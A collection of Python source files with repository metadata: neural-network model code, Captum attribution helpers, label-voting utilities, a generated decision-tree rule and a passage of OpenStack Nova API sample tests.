# if cluster not in self.cluster_colors.index:
# self.cluster_colors = self.cluster_colors.append(
# pd.Series([color], index=[cluster])).sort_index()
for cluster, group in zip(clusters, groups):
self.experiment.channel_groups[self.shank].clusters.main.add_cluster(
id=cluster, cluster_group=group)
self.read_clusters()
def add_group(self, group, name):
# if group not in self.group_colors.index:
# self.group_colors = self.group_colors.append(
# pd.Series([color], index=[group])).sort_index()
# if group not in self.group_names.index:
# self.group_names = self.group_names.append(
# pd.Series([name], index=[group])).sort_index()
groups = self.experiment.channel_groups[self.shank].cluster_groups.main
groups.add_group(id=group, name=name,)
self.read_clusters()
# Remove.
def remove_cluster(self, cluster):
if np.any(np.in1d(cluster, self.clusters)):
raise ValueError(("Cluster {0:d} is not empty and cannot "
"be removed.").format(cluster))
self.experiment.channel_groups[self.shank].clusters.main.remove_cluster(
id=cluster,)
self.read_clusters()
def remove_group(self, group):
if np.any(np.in1d(group, self.cluster_groups)):
raise ValueError(("Group {0:d} is not empty and cannot "
"be removed.").format(group))
self.experiment.channel_groups[self.shank].cluster_groups.main.remove_group(
id=group,)
self.read_clusters()
# Access to the data: spikes
# --------------------------
def select(self, spikes=None, clusters=None):
if clusters is not None:
if not hasattr(clusters, '__len__'):
clusters = [clusters]
spikes = get_spikes_in_clusters(clusters, self.clusters)
self.spikes_selected = spikes
self.clusters_selected = clusters
# Log file.
# ---------
def initialize_logfile(self):
self.logfile = FileLogger(self.filename_log, name='datafile',
level=self.userpref['loglevel_file'])
# Register log file.
register(self.logfile)
# Save.
# -----
def save(self, renumber=False):
self.report_progress_save(1, 4)
if renumber:
self.renumber()
self.clusters = self.clusters_renumbered
self.cluster_info = self.cluster_info_renumbered
self._update_data()
# Save the clusters in the .clu file.
clu = self._filenames['clu']
clu_split = clu.split('.')
clu_split[-1] = str(self.shank)
clu = '.'.join(clu_split)
save_clusters(clu,
convert_to_clu(self.clusters, self.cluster_info['group']))
self.report_progress_save(2, 4)
# self.close()
self.report_progress_save(3, 4)
# self.open()
self.report_progress_save(4, 4)
# Close functions.
# ----------------
def close(self):
"""Close the kwik HDF5 file."""
# if hasattr(self, 'kwik') and self.kwik.isopen:
# self.kwik.flush()
# self.kwik.close()
if self.experiment is not None:
self.experiment.close()
self.experiment = None
if hasattr(self, 'logfile'):
unregister(self.logfile)
| 37.837438 | 149 | 0.622315 |
795c62eeb29f6d2d2e3e67921969c108b228e910 | 5,152 | py | Python | interpretation_package/.ipynb_checkpoints/interpret_flair-checkpoint.py | krzysztoffiok/interpret-flair | 2f1911213cfe78a41b5c176d1d4303ef888718b7 | [
"MIT"
] | 10 | 2020-12-18T03:22:31.000Z | 2021-09-06T20:07:51.000Z | interpretation_package/.ipynb_checkpoints/interpret_flair-checkpoint.py | krzysztoffiok/interpret-flair | 2f1911213cfe78a41b5c176d1d4303ef888718b7 | [
"MIT"
] | 7 | 2020-11-21T22:10:20.000Z | 2021-05-13T12:45:19.000Z | interpretation_package/.ipynb_checkpoints/interpret_flair-checkpoint.py | krzysztoffiok/interpret-flair | 2f1911213cfe78a41b5c176d1d4303ef888718b7 | [
"MIT"
] | 3 | 2021-05-13T07:52:49.000Z | 2021-12-27T15:14:01.000Z | import torch
import torch.nn as nn
from flair.data import Sentence
from captum.attr import (
LayerIntegratedGradients
)
from captum.attr import visualization as viz
def interpret_sentence(flair_model_wrapper, lig, sentence, target_label, visualization_list, n_steps=100, estimation_method="gausslegendre",internal_batch_size=None):
"""
We can visualise the attributions made by making use of Pytorch Captum.
Inputs:
flair_model_wrapper: class containing a customized forward function of Flair model.
lig: the layer integrated gradient object.
sentence: the Flair sentence-object we want to interpret.
target_label: the ground truth class-label of the sentence.
visualization_list: a list to store the visualization records in.
"""
# Return the target index from the label dictionary.
target_index = flair_model_wrapper.label_dictionary.get_idx_for_item(target_label)
# In order maintain consistency with Flair, we apply the same tokenization
# steps.
flair_sentence = Sentence(sentence)
tokenized_sentence = flair_sentence.to_tokenized_string()
# This calculates the token input IDs tensor for the model.
input_ids = flair_model_wrapper.tokenizer.encode(tokenized_sentence,
add_special_tokens=False,
max_length=flair_model_wrapper.tokenizer.model_max_length,
truncation=True,
return_tensors="pt")
# Create a baseline by creating a tensor of equal length
# containing the padding token tensor id.
ref_base_line = torch.ones_like(input_ids)
# Convert back to tokens as the model requires.
# As some words might get split up. e.g. Caroll to Carol l.
all_tokens = flair_model_wrapper.tokenizer.convert_ids_to_tokens(input_ids[0])
# The tokenizer in the model adds a special character
# in front of every sentence.
readable_tokens = [token.replace("▁", "") for token in all_tokens]
# The input IDs are passed to the embedding layer of the model.
# It is better to return the logits for Captum.
# https://github.com/pytorch/captum/issues/355#issuecomment-619610044
# Thus we calculate the softmax afterwards.
# For now, I take the first dimension and run this sentence, per sentence.
model_outputs = flair_model_wrapper(input_ids)
softmax = torch.nn.functional.softmax(model_outputs[0], dim=0)
# Return the confidence and the class ID of the top predicted class.
conf, idx = torch.max(softmax, 0)
#conf, idx = torch.max(model_outputs[0], 0)
# Returns the probability.
prediction_confidence = conf.item()
# Returns the label name from the top prediction class.
pred_label = flair_model_wrapper.label_dictionary.get_item_for_index(idx.item())
# Calculate the attributions according to the LayerIntegratedGradients method.
attributions_ig, delta = lig.attribute(input_ids,
baselines=ref_base_line,
n_steps=n_steps,
return_convergence_delta=True,
target=target_index,
method=estimation_method,
internal_batch_size=internal_batch_size)
convergence_delta = abs(delta)
print('pred: ', idx.item(), '(', '%.2f' % conf.item(), ')', ', delta: ', convergence_delta)
word_attributions, attribution_score = summarize_attributions(attributions_ig)
visualization_list.append(
viz.VisualizationDataRecord(word_attributions=word_attributions,
pred_prob=prediction_confidence,
pred_class=pred_label,
true_class=target_label,
attr_class=target_label,
attr_score=attribution_score,
raw_input=readable_tokens,
convergence_score=delta)
)
# Return these for the sanity checks.
return readable_tokens, word_attributions, convergence_delta
def summarize_attributions(attributions):
"""
Helper function for calculating word attributions.
Inputs:
attributions_ig: integrated gradients attributions.
Ouputs:
word_attributions: the attributions score per token.
attribution_score: the attribution score of the entire document w.r.t. ground label.
"""
attributions = attributions.sum(dim=-1).squeeze(0)
attributions = attributions / torch.norm(attributions)
attribution_score = attributions.sum()
return attributions, attribution_score
def visualize_attributions(visualization_list):
"""
Helper function to call Captum's visualization methods.
Inputs:
visualization_list: a list containing the integrated gradients attributions.
"""
viz.visualize_text(visualization_list)
| 40.566929 | 166 | 0.657026 |
795c6428e693a34b6ba5c1102787477fab08ea63 | 8,544 | py | Python | nets/GC_GST.py | haoyanbin918/Group-Contextualization | aa59d9979f6f6578f143df48086260afdde65b86 | [
"Apache-2.0"
] | 4 | 2022-03-21T03:25:57.000Z | 2022-03-23T13:07:22.000Z | nets/GC_GST.py | haoyanbin918/Group-Contextualization | aa59d9979f6f6578f143df48086260afdde65b86 | [
"Apache-2.0"
] | 1 | 2022-03-21T06:49:25.000Z | 2022-03-21T07:47:54.000Z | nets/GC_GST.py | haoyanbin918/Group-Contextualization | aa59d9979f6f6578f143df48086260afdde65b86 | [
"Apache-2.0"
] | 1 | 2022-03-22T06:03:33.000Z | 2022-03-22T06:03:33.000Z | import torch
import torch.nn as nn
import math
import torch.utils.model_zoo as model_zoo
import torchvision.models as models
from nets.Calibrator3D import GC_L33Dnb, GC_T13Dnb, GC_S23DDnb, GC_CLLDnb
__all__ = ['ResNet', 'resnet50', 'resnet101','resnet152']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, alpha, beta, stride = 1, downsample = None, use_ef=False, cdiv=8, loop_id=0):
super(Bottleneck, self).__init__()
self.use_ef = use_ef
self.conv1 = nn.Conv3d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm3d(planes)
self.conv2 = nn.Conv3d(planes// beta, planes//alpha*(alpha-1), kernel_size=(1,3,3), stride=(1,stride,stride),
padding=(0,1,1), bias=False)
self.Tconv = nn.Conv3d(planes//beta, planes//alpha, kernel_size = 3, bias = False,stride=(1,stride,stride),
padding = (1,1,1))
self.bn2 = nn.BatchNorm3d(planes)
self.conv3 = nn.Conv3d(planes, planes * self.expansion, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm3d(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.alpha = alpha
self.beta = beta
if self.use_ef:
print('=> Using Partial Channel Calibrator with cdiv: {}'.format(cdiv))
self.loop_id = loop_id
self.eft_c = planes // cdiv
self.eft1 = GC_L33Dnb(self.eft_c, self.eft_c)
self.eft2 = GC_T13Dnb(self.eft_c, self.eft_c)
self.eft3 = GC_S23DDnb(self.eft_c, self.eft_c)
self.eft4 = GC_CLLDnb(self.eft_c, self.eft_c)
# self.eft = (self.eft_c, self.eft_c, num_segments)
self.start_c1 = loop_id*self.eft_c
self.end_c1 = self.start_c1 + self.eft_c
loop_id2 = (loop_id+1)%cdiv
self.start_c2 = loop_id2*self.eft_c
self.end_c2 = self.start_c2 + self.eft_c
loop_id3 = (loop_id+2)%cdiv
self.start_c3 = loop_id3*self.eft_c
self.end_c3 = self.start_c3 + self.eft_c
loop_id4 = (loop_id+3)%cdiv
self.start_c4 = loop_id4*self.eft_c
self.end_c4 = self.start_c4 + self.eft_c
print('loop_ids: [{}:({}-{}), {}:({}-{}), {}:({}-{}), {}:({}-{})]'.format(loop_id, self.start_c1, self.end_c1, \
loop_id2, self.start_c2, self.end_c2, loop_id3, self.start_c3, self.end_c3, loop_id4, self.start_c4, self.end_c4))
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
if self.beta == 2:
nchannels = out.size()[1] // self.beta
left = out[:,:nchannels]
right = out[:,nchannels:]
out1 = self.conv2(left)
out2 = self.Tconv(right)
else:
out1 = self.conv2(out)
out2 = self.Tconv(out)
out = torch.cat((out1,out2),dim=1)
if self.use_ef:
new_out = torch.zeros_like(out)
B_size, C_size, T_size, H_size, W_size = new_out.size()
# new_out = out
new_out[:, self.start_c1:self.end_c1, :, :, :] = self.eft1(out[:, self.start_c1:self.end_c1, :, :, :])
new_out[:, self.start_c2:self.end_c2, :, :, :] = self.eft2(out[:, self.start_c2:self.end_c2, :, :, :])
new_out[:, self.start_c3:self.end_c3, :, :, :] = self.eft3(out[:, self.start_c3:self.end_c3, :, :, :])
new_out[:, self.start_c4:self.end_c4, :, :, :] = self.eft4(out[:, self.start_c4:self.end_c4, :, :, :])
# new_out = torch.zeros_like(out)
# new_out[:, :self.eft_c, :, :] = self.eft(out[:, :self.eft_c, :, :])
if self.end_c4 > self.start_c1:
if self.start_c1 > 0:
new_out[:, :self.start_c1:, :, :] = out[:, :self.start_c1:, :, :]
if self.end_c4 < C_size:
new_out[:, self.end_c4:, :, :] = out[:, self.end_c4:, :, :]
elif self.end_c4 < self.start_c1:
new_out[:, self.end_c4:self.start_c1:, :, :] = out[:, self.end_c4:self.start_c1:, :, :]
out = new_out
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(residual)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, alpha=4, beta=2, num_classes=1000, cdiv=4, loop=False):
self.inplanes = 64
self.loop_id = 0
super(ResNet, self).__init__()
self.conv1 = nn.Conv3d(3, 64, kernel_size=(1,7,7), stride=(1,2,2), padding=(0,3,3),
bias=False)
self.bn1 = nn.BatchNorm3d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool3d(kernel_size=(1,3,3), stride=(1,2,2), padding=(0,1,1))
self.loop = loop
self.layer1 = self._make_layer(block, 64, layers[0], alpha, beta, cdiv=cdiv)
self.layer2 = self._make_layer(block, 128, layers[1], alpha, beta, stride=2, cdiv=cdiv)
self.layer3 = self._make_layer(block, 256, layers[2], alpha, beta, stride=2, cdiv=cdiv)
self.layer4 = self._make_layer(block, 512, layers[3], alpha, beta, stride=2, cdiv=cdiv)
self.avgpool = nn.AvgPool2d(7, stride=1)
self.fc = nn.Linear(512 * block.expansion, num_classes)
for name, m in self.named_modules():
if 'eft' not in name:
if isinstance(m, nn.Conv2d) or isinstance(m, nn.Conv3d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d) or isinstance(m, nn.BatchNorm3d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def _make_layer(self, block, planes, blocks, alpha, beta, stride=1, cdiv=2):
print('=> Processing stage with {} blocks'.format(blocks))
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv3d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=(1,stride,stride), bias=False),
nn.BatchNorm3d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, alpha, beta, stride, downsample, True, cdiv=cdiv, loop_id=self.loop_id))
self.inplanes = planes * block.expansion
if self.loop:
self.loop_id = (self.loop_id+1)%cdiv
n_round = 1
if blocks >= 23:
n_round = 2
print('=> Using n_round {} to insert Group Context'.format(n_round))
for i in range(1, blocks):
if i % n_round == 0:
use_ef = True
else:
use_ef = False
layers.append(block(self.inplanes, planes, alpha, beta, use_ef=use_ef, cdiv=cdiv, loop_id=self.loop_id))
if self.loop and use_ef:
self.loop_id = (self.loop_id+1)%cdiv
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = x.transpose(1,2).contiguous()
x = x.view((-1,)+x.size()[2:])
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def resnet50(alpha, beta,**kwargs):
"""Constructs a ResNet-50 based model.
"""
model = ResNet(Bottleneck, [3, 4, 6, 3], alpha, beta, **kwargs)
checkpoint = model_zoo.load_url(model_urls['resnet50'])
layer_name = list(checkpoint.keys())
for ln in layer_name:
if 'conv' in ln or 'downsample.0.weight' in ln:
checkpoint[ln] = checkpoint[ln].unsqueeze(2)
if 'conv2' in ln:
n_out, n_in, _, _, _ = checkpoint[ln].size()
checkpoint[ln] = checkpoint[ln][:n_out // alpha * (alpha - 1), :n_in//beta,:,:,:]
model.load_state_dict(checkpoint,strict = False)
return model
def resnet101(alpha, beta ,**kwargs):
"""Constructs a ResNet-101 model.
Args:
groups
"""
model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs)
checkpoint = model_zoo.load_url(model_urls['resnet101'])
layer_name = list(checkpoint.keys())
for ln in layer_name:
if 'conv' in ln or 'downsample.0.weight' in ln:
checkpoint[ln] = checkpoint[ln].unsqueeze(2)
if 'conv2' in ln:
n_out, n_in, _, _, _ = checkpoint[ln].size()
checkpoint[ln] = checkpoint[ln][:n_out // alpha * (alpha - 1), :n_in//beta,:,:,:]
model.load_state_dict(checkpoint,strict = False)
return model
if __name__ == "__main__":
inputs = torch.rand(1, 3, 8, 224, 224) #[btz, channel, T, H, W]
# inputs = torch.rand(1, 64, 4, 112, 112) #[btz, channel, T, H, W]
net = resnet50(4, 2, num_classes=1000, cdiv=4)
net.eval()
output = net(inputs)
print(output.size())
from thop import profile
flops, params = profile(net, inputs=(inputs, ))
print(flops)
print(params)
| 34.451613 | 130 | 0.660229 |
795c6606c019a7661269455e17110a482e63c8c4 | 693 | py | Python | 01 List/Problems/02_separate_even_odd.py | kmanadkat/leetcode-101 | 8a9db22d98692d634a497ba76c7e9f792bb1f1bc | [
"MIT"
] | null | null | null | 01 List/Problems/02_separate_even_odd.py | kmanadkat/leetcode-101 | 8a9db22d98692d634a497ba76c7e9f792bb1f1bc | [
"MIT"
] | null | null | null | 01 List/Problems/02_separate_even_odd.py | kmanadkat/leetcode-101 | 8a9db22d98692d634a497ba76c7e9f792bb1f1bc | [
"MIT"
] | 1 | 2021-09-15T11:17:36.000Z | 2021-09-15T11:17:36.000Z | from typing import List, Tuple
# Approach 1 - Simpler
def separateEvenOdd(inputList: List) -> Tuple:
even = []
odd = []
for element in inputList:
if element % 2 == 0:
even.append(element)
else:
odd.append(element)
return even, odd
# Approach 2 - List Comprehensions
def separateEvenOddComprehension(inputList: List) -> Tuple:
even = [x for x in inputList if x % 2 == 0]
odd = [x for x in inputList if x % 2 != 0]
return even, odd
even1, odd1 = separateEvenOdd(inputList=[10, 41, 30, 15, 80])
print(even1)
print(odd1)
even2, odd2 = separateEvenOddComprehension(inputList=[10, 41, 30, 15, 80])
print(even2)
print(odd2)
| 22.354839 | 74 | 0.636364 |
795c665c96357ffa519960db2f4b35dd09a33717 | 3,971 | py | Python | skactiveml/utils/_aggregation.py | AlexandreAbraham/scikit-activeml | 1e1f4615948501cb9c9559de2e94433f700b2b80 | [
"BSD-3-Clause"
] | 40 | 2020-09-22T00:50:52.000Z | 2022-03-15T14:16:42.000Z | skactiveml/utils/_aggregation.py | AlexandreAbraham/scikit-activeml | 1e1f4615948501cb9c9559de2e94433f700b2b80 | [
"BSD-3-Clause"
] | 161 | 2020-08-10T09:24:03.000Z | 2022-03-29T13:39:46.000Z | skactiveml/utils/_aggregation.py | AlexandreAbraham/scikit-activeml | 1e1f4615948501cb9c9559de2e94433f700b2b80 | [
"BSD-3-Clause"
] | 3 | 2021-11-15T09:10:59.000Z | 2021-12-15T11:40:47.000Z | import numpy as np
from ._label import ExtLabelEncoder, is_labeled
from sklearn.utils import check_array, check_consistent_length
def compute_vote_vectors(y, w=None, classes=None, missing_label=np.nan):
"""Counts number of votes per class label for each sample.
Parameters
----------
y : array-like, shape (n_samples) or (n_samples, n_annotators)
Class labels.
w : array-like, shape (n_samples) or (n_samples, n_annotators),
default=np.ones_like(y)
Class label weights.
classes : array-like, shape (n_classes), default=None
Holds the label for each class.
missing_label : scalar|string|np.nan|None, default=np.nan
Value to represent a missing label.
Returns
-------
v : array-like, shape (n_samples, n_classes)
V[i,j] counts number of votes per class j for sample i.
"""
# check input parameters
le = ExtLabelEncoder(classes=classes, missing_label=missing_label)
y = le.fit_transform(y)
n_classes = len(le.classes_)
y = y if y.ndim == 2 else y.reshape((-1, 1))
is_unlabeled_y = np.isnan(y)
y[is_unlabeled_y] = 0
y = y.astype(int)
if n_classes == 0:
raise ValueError(
"Number of classes can not be inferred. "
"There must be at least one assigned label or classes must not be"
"None. "
)
w = np.ones_like(y) if w is None else check_array(w, ensure_2d=False,
force_all_finite=False,
dtype=None, copy=True)
w = w if w.ndim == 2 else w.reshape((-1, 1))
check_consistent_length(y, w)
check_consistent_length(y.T, w.T)
w[is_unlabeled_y] = 1
# count class labels per class and weight by confidence scores
w[np.logical_or(np.isnan(w), is_unlabeled_y)] = 0
y_off = y + np.arange(y.shape[0])[:, None] * n_classes
v = np.bincount(y_off.ravel(), minlength=y.shape[0] * n_classes,
weights=w.ravel())
v = v.reshape(-1, n_classes)
return v
def majority_vote(y, w=None, classes=None, missing_label=np.nan):
""" Assigns a label to each sample based on weighted voting.
Samples with no labels are assigned with `missing_label`.
Parameters
----------
y : array-like, shape (n_samples) or (n_samples, n_annotators)
Class labels.
w : array-like, shape (n_samples) or (n_samples, n_annotators),
default=np.ones_like(y)
Class label weights.
classes : array-like, shape (n_classes), default=None
Holds the label for each class.
missing_label : scalar|string|np.nan|None, default=np.nan
Value to represent a missing label.
Returns
-------
y_aggregated : array-like, shape (n_samples)
Assigned labels for each sample.
"""
# check input parameters
y = check_array(y, ensure_2d=False, dtype=None, force_all_finite=False)
y = y if y.ndim == 2 else y.reshape((-1, 1))
n_samples = y.shape[0]
# extract labeled samples
is_labeled_y = np.any(is_labeled(y, missing_label), axis=1)
y_labeled = y[is_labeled_y]
# infer encoding
le = ExtLabelEncoder(classes=classes, missing_label=missing_label)
le.fit(y_labeled)
y_aggregated = np.full((n_samples,), missing_label, dtype=le._dtype)
if np.any(is_labeled_y):
# transform labels
y_labeled_transformed = le.transform(y_labeled)
max_value_y_l_t = np.nanmax(y_labeled_transformed)
# perform voting
vote_matrix = compute_vote_vectors(y_labeled_transformed, w,
classes=np.arange(max_value_y_l_t+1))
vote_vector = vote_matrix.argmax(axis=1)
# inverse transform labels
y_labeled_inverse_transformed = le.inverse_transform(vote_vector)
# assign labels
y_aggregated[is_labeled_y] = y_labeled_inverse_transformed
return y_aggregated
| 34.530435 | 80 | 0.639637 |
795c674cfb8299abe5633b42de3847a970b71d1a | 2,158 | py | Python | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/16_features/numtrees_30/rule_19.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/16_features/numtrees_30/rule_19.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/16_features/numtrees_30/rule_19.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | def findDecision(obj): #obj[0]: Passanger, obj[1]: Weather, obj[2]: Time, obj[3]: Coupon, obj[4]: Coupon_validity, obj[5]: Gender, obj[6]: Age, obj[7]: Children, obj[8]: Education, obj[9]: Occupation, obj[10]: Income, obj[11]: Bar, obj[12]: Coffeehouse, obj[13]: Restaurant20to50, obj[14]: Direction_same, obj[15]: Distance
# {"feature": "Passanger", "instances": 34, "metric_value": 0.9082, "depth": 1}
if obj[0]<=2:
# {"feature": "Time", "instances": 28, "metric_value": 0.9666, "depth": 2}
if obj[2]<=2:
# {"feature": "Children", "instances": 20, "metric_value": 0.8113, "depth": 3}
if obj[7]<=0:
# {"feature": "Coupon", "instances": 11, "metric_value": 0.4395, "depth": 4}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
# {"feature": "Coupon_validity", "instances": 2, "metric_value": 1.0, "depth": 5}
if obj[4]>0:
return 'True'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.9911, "depth": 4}
if obj[13]>0.0:
# {"feature": "Coupon", "instances": 7, "metric_value": 0.8631, "depth": 5}
if obj[3]<=3:
# {"feature": "Education", "instances": 5, "metric_value": 0.971, "depth": 6}
if obj[8]>2:
# {"feature": "Distance", "instances": 3, "metric_value": 0.9183, "depth": 7}
if obj[15]<=2:
return 'False'
elif obj[15]>2:
return 'True'
else: return 'True'
elif obj[8]<=2:
return 'True'
else: return 'True'
elif obj[3]>3:
return 'True'
else: return 'True'
elif obj[13]<=0.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[2]>2:
# {"feature": "Occupation", "instances": 8, "metric_value": 0.8113, "depth": 3}
if obj[9]>1:
return 'False'
elif obj[9]<=1:
# {"feature": "Coupon", "instances": 3, "metric_value": 0.9183, "depth": 4}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[0]>2:
return 'True'
else: return 'True'
| 37.206897 | 323 | 0.567655 |
795c67a360132e33635e369db036484e1bf509be | 32,143 | py | Python | nova-19.0.1/nova/tests/functional/api_sample_tests/test_servers.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 1 | 2019-04-22T06:25:26.000Z | 2019-04-22T06:25:26.000Z | nova/tests/functional/api_sample_tests/test_servers.py | woraser/nova | fc3890667e4971e3f0f35ac921c2a6c25f72adec | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | nova/tests/functional/api_sample_tests/test_servers.py | woraser/nova | fc3890667e4971e3f0f35ac921c2a6c25f72adec | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import time
from oslo_utils import fixture as utils_fixture
from oslo_utils import timeutils
import six
from nova.api.openstack import api_version_request as avr
import nova.conf
from nova.tests import fixtures as nova_fixtures
from nova.tests.functional.api_sample_tests import api_sample_base
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit.image import fake
CONF = nova.conf.CONF
class ServersSampleBase(api_sample_base.ApiSampleTestBaseV21):
microversion = None
sample_dir = 'servers'
user_data_contents = six.b('#!/bin/bash\n/bin/su\necho "I am in you!"\n')
user_data = base64.b64encode(user_data_contents)
common_req_names = [
(None, '2.36', 'server-create-req'),
('2.37', '2.56', 'server-create-req-v237'),
('2.57', None, 'server-create-req-v257')
]
def _get_request_name(self, use_common):
if not use_common:
return 'server-create-req'
api_version = self.microversion or '2.1'
for min, max, name in self.common_req_names:
if avr.APIVersionRequest(api_version).matches(
avr.APIVersionRequest(min), avr.APIVersionRequest(max)):
return name
def _post_server(self, use_common_server_api_samples=True, name=None,
extra_subs=None):
# param use_common_server_api_samples: Boolean to set whether tests use
# common sample files for server post request and response.
# Default is True which means _get_sample_path method will fetch the
# common server sample files from 'servers' directory.
# Set False if tests need to use extension specific sample files
subs = {
'image_id': fake.get_valid_image_id(),
'host': self._get_host(),
'compute_endpoint': self._get_compute_endpoint(),
'versioned_compute_endpoint': self._get_vers_compute_endpoint(),
'glance_host': self._get_glance_host(),
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::',
'user_data': (self.user_data if six.PY2
else self.user_data.decode('utf-8')),
'uuid': '[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}'
'-[0-9a-f]{4}-[0-9a-f]{12}',
'name': 'new-server-test' if name is None else name,
}
# If the template is requesting an explicit availability zone and
# the test is setup to have AZs, use the first one in the list which
# should default to "us-west".
if self.availability_zones:
subs['availability_zone'] = self.availability_zones[0]
if extra_subs:
subs.update(extra_subs)
orig_value = self.__class__._use_common_server_api_samples
try:
self.__class__._use_common_server_api_samples = (
use_common_server_api_samples)
response = self._do_post('servers', self._get_request_name(
use_common_server_api_samples), subs)
status = self._verify_response('server-create-resp', subs,
response, 202)
return status
finally:
self.__class__._use_common_server_api_samples = orig_value
def setUp(self):
super(ServersSampleBase, self).setUp()
self.api.microversion = self.microversion
class ServersSampleJsonTest(ServersSampleBase):
# This controls whether or not we use the common server API sample
# for server post req/resp.
use_common_server_post = True
microversion = None
def test_servers_post(self):
return self._post_server(
use_common_server_api_samples=self.use_common_server_post)
def test_servers_get(self):
self.stub_out(
'nova.db.api.block_device_mapping_get_all_by_instance_uuids',
fakes.stub_bdm_get_all_by_instance_uuids)
uuid = self.test_servers_post()
response = self._do_get('servers/%s' % uuid)
subs = {}
subs['hostid'] = '[a-f0-9]+'
subs['id'] = uuid
subs['instance_name'] = 'instance-\d{8}'
subs['hypervisor_hostname'] = r'[\w\.\-]+'
subs['hostname'] = r'[\w\.\-]+'
subs['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
subs['access_ip_v4'] = '1.2.3.4'
subs['access_ip_v6'] = '80fe::'
subs['user_data'] = (self.user_data if six.PY2
else self.user_data.decode('utf-8'))
# config drive can be a string for True or empty value for False
subs['cdrive'] = '.*'
self._verify_response('server-get-resp', subs, response, 200)
def test_servers_list(self):
uuid = self._post_server()
response = self._do_get('servers?limit=1')
subs = {'id': uuid}
self._verify_response('servers-list-resp', subs, response, 200)
def test_servers_details(self):
self.stub_out(
'nova.db.api.block_device_mapping_get_all_by_instance_uuids',
fakes.stub_bdm_get_all_by_instance_uuids)
uuid = self.test_servers_post()
response = self._do_get('servers/detail?limit=1')
subs = {}
subs['hostid'] = '[a-f0-9]+'
subs['id'] = uuid
subs['instance_name'] = 'instance-\d{8}'
subs['hypervisor_hostname'] = r'[\w\.\-]+'
subs['hostname'] = r'[\w\.\-]+'
subs['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
subs['access_ip_v4'] = '1.2.3.4'
subs['access_ip_v6'] = '80fe::'
subs['user_data'] = (self.user_data if six.PY2
else self.user_data.decode('utf-8'))
# config drive can be a string for True or empty value for False
subs['cdrive'] = '.*'
self._verify_response('servers-details-resp', subs, response, 200)
class ServersSampleJson23Test(ServersSampleJsonTest):
microversion = '2.3'
scenarios = [('v2_3', {'api_major_version': 'v2.1'})]
class ServersSampleJson29Test(ServersSampleJsonTest):
microversion = '2.9'
# NOTE(gmann): microversion tests do not need to run for v2 API
# so defining scenarios only for v2.9 which will run the original tests
# by appending '(v2_9)' in test_id.
scenarios = [('v2_9', {'api_major_version': 'v2.1'})]
class ServersSampleJson216Test(ServersSampleJsonTest):
microversion = '2.16'
scenarios = [('v2_16', {'api_major_version': 'v2.1'})]
class ServersSampleJson219Test(ServersSampleJsonTest):
microversion = '2.19'
scenarios = [('v2_19', {'api_major_version': 'v2.1'})]
def test_servers_post(self):
return self._post_server(False)
def test_servers_put(self):
uuid = self.test_servers_post()
response = self._do_put('servers/%s' % uuid, 'server-put-req', {})
subs = {
'image_id': fake.get_valid_image_id(),
